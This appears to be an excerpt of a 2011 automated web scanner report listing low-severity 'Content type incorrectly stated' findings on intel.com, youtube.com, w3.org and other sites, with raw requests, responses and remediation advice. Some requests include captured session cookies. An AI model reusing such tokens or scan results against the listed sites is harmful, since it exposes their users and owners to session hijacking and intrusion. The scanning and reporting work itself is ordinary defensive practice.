GET /xmlns/lop HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 404 Not Found Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Expires: Sat, 05 Feb 2011 23:21:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 05 Feb 2011 23:21:01 GMT Content-Length: 18367 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- IMPORTANT NOTE TO WEB AUTHORS UPDATING THIS PAGE: Do NOT use .inc files for the header a ...[SNIP]...
GET /js.html HTTP/1.1 Host: www.json.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:21:16 GMT Server: Apache Last-Modified: Thu, 18 Nov 2010 18:57:56 GMT ETag: "b3-19a4-4ce57734" Accept-Ranges: bytes Content-Length: 6564 Connection: close Content-Type: text/html
GET /<BR/ HTTP/1.1 Host: www.mobileworldcongress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request Content-Type: text/html Date: Sat, 05 Feb 2011 23:21:27 GMT Connection: close Content-Length: 34
GET /ep.swf HTTP/1.1 Host: www.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 23:32:33 GMT Server: Apache Last-Modified: Thu, 02 Sep 2010 03:12:26 GMT ETag: "201-48f3e2efe3a80" Accept-Ranges: bytes Content-Length: 513 Vary: Accept-Encoding Content-Type: text/html Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <!-- Pad to 512 bytes. IE will not recognize this page otherwise. --> <!- ...[SNIP]...
24. Content type incorrectly statedpreviousnext There are 23 instances of this issue:
If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
The response contains the following Content-type statement:
Content-Type: text/html; charset=UTF-8
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /feeds/api/playlists/698CFFD6A87A1ACB/batch HTTP/1.1 Host: gdata.youtube.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE;
Response
HTTP/1.1 400 Bad Request X-GData-User-Country: FR Content-Type: text/html; charset=UTF-8 Date: Sat, 05 Feb 2011 23:22:43 GMT Expires: Sat, 05 Feb 2011 23:22:43 GMT Cache-Control: private, max-age=0 X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block Server: GSE Connection: close Content-Length: 32
The response contains the following Content-type statement:
Content-Type: text/html; charset=UTF-8
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /common/mobile/ HTTP/1.1 Host: www.intc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; INTC_BRIEFCASE=UPDATED%7C40489%2E7589005; INTC_PREVIEW=; __utmz=170079864.1296947606.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/p/en_US/business; __utma=170079864.197299371.1296947606.1296947606.1296947606.1; INTC_SESSION=1158415371%7C%20%7Bts%20%272011%2D02%2D05%2018%3A12%3A49%27%7D%7C%20%7Bts%20%272011%2D02%2D05%2018%3A14%3A50%27%7D%7C1D065BF6CBF3E92923967C8F41218506; __utmc=170079864; __utmb=170079864.3.10.1296947606;
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 23:14:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
HTTP/1.1 200 OK Content-Length: 35136 Content-Type: image/png Last-Modified: Thu, 18 Nov 2010 23:13:20 GMT Accept-Ranges: bytes ETag: "06883307687cb1:43cd" Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Date: Sun, 06 Feb 2011 01:51:18 GMT Connection: close
HTTP/1.1 200 OK Content-Length: 135686 Content-Type: image/jpeg Last-Modified: Tue, 13 Jul 2010 23:14:35 GMT Accept-Ranges: bytes ETag: "807f5728e122cb1:4400" Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Date: Sat, 05 Feb 2011 23:12:08 GMT Connection: close
HTTP/1.1 200 OK Content-Type: application/x-javascript Last-Modified: Tue, 18 Jan 2011 03:36:26 GMT Accept-Ranges: bytes ETag: "0d97ce2c0b6cb1:43db" Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Vary: Accept-Encoding Date: Sat, 05 Feb 2011 23:12:07 GMT Connection: close Content-Length: 7032
HTTP/1.1 200 OK Content-Type: application/x-javascript Last-Modified: Thu, 09 Jul 2009 21:48:31 GMT Accept-Ranges: bytes ETag: "b43a1f0df0ca1:4400" Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Vary: Accept-Encoding Date: Sat, 05 Feb 2011 23:12:08 GMT Connection: close Content-Length: 14
HTTP/1.1 200 OK Content-Type: application/x-javascript Last-Modified: Fri, 10 Dec 2010 17:36:13 GMT Accept-Ranges: bytes ETag: "58e2b3bd9098cb1:43cf" Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Vary: Accept-Encoding Date: Sat, 05 Feb 2011 23:12:08 GMT Connection: close Content-Length: 18798
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain XML.
Request
GET /<BR/ HTTP/1.1 Host: www.mobileworldcongress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 400 Bad Request Content-Type: text/html Date: Sat, 05 Feb 2011 23:21:27 GMT Connection: close Content-Length: 34
The response contains the following Content-type statement:
Content-Type: text/html; charset=iso-8859-1
The response states that it contains HTML. However, it actually appears to contain XML.
Request
GET /1999/XSL/Transform HTTP/1.1 Host: www.w3.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:32:28 GMT Server: Apache/2 Content-Location: Transform.html Vary: negotiate,accept,Accept-Encoding TCN: choice Last-Modified: Wed, 12 May 2010 21:03:51 GMT ETag: "7f3-4866bfa9c1bc0;b4-46552f8754040" Accept-Ranges: bytes Content-Length: 2035 Cache-Control: max-age=21600 Expires: Sun, 06 Feb 2011 05:32:28 GMT P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml" Connection: close Content-Type: text/html; charset=iso-8859-1
The response contains the following Content-type statement:
Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain script.
Request
GET /TR/xhtml1/DTD/xhtml1-strict.dtd HTTP/1.1 Host: www.w3.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:32:28 GMT Server: Apache/2 Content-Location: xhtml1-strict.dtd.raw Vary: negotiate,accept-encoding,User-Agent TCN: choice Last-Modified: Thu, 01 Aug 2002 13:56:03 GMT ETag: "6380-3a726d58522c0;475d1b7e9a540" Accept-Ranges: bytes Content-Length: 25472 Cache-Control: max-age=7776000 Expires: Fri, 06 May 2011 23:32:28 GMT P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml" Connection: close Content-Type: text/plain
<!-- Extensible HTML version 1.0 Strict DTD
This is the same as HTML 4 Strict except for changes due to the differences between XML and SGML.
If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.
In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 Content-Language: en-US Content-Length: 2258 Server: IA Web Server Date: Sun, 06 Feb 2011 01:55:18 GMT Connection: close